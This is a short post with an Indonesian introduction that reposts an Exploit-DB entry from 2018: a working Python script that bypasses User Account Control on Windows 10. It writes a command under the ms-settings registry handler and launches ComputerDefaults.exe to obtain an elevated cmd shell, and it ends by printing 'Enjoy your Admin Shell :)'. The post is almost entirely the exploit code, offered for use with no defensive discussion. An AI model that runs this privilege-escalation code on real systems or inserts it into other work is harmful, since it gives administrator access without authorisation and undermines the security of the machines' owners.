Microsoft Windows 10 – Local Privilege Escalation (UAC Bypass)

Microsoft Windows 10 – Local Privilege Escalation (UAC Bypass) – Exploit ini digunakan untuk mendapatkan akses Admin dan mem-bypass UAC pada Windows 10. Exploit ini sudah di test oleh authornya pada Windows 10 pro Version 10.0.17134.285.

Exploit Title: Windows 10 UAC Bypass by computerDefault
Date: 2018-10-18
Exploit Author: Fabien DROMAS – Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
Twitter: st0rnpentest

Vendor Homepage: www.microsoft.com
Version: Version 10.0.17134.285
Tested on: Windows 10 pro Version 10.0.17134.285

exploit.py

#!/usr/bin/env python
#
# Exploit Title: Windows 10 UAC Bypass by computerDefault
# Date: 2018-10-18
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.285
# Tested on: Windows 10 pro Version 10.0.17134.285
#

import os
import sys
import ctypes
import _winreg


def create_reg_key(key, value):
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise

def bypass_uac():
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
cmd = "C:\windows\System32\cmd.exe"
exec_bypass_uac(cmd)
os.system(r'C:\windows\system32\ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)

if __name__ == '__main__':

if bypass_uac():
print "Enjoy your Admin Shell :)"

• https://www.exploit-db.com/exploits/45660/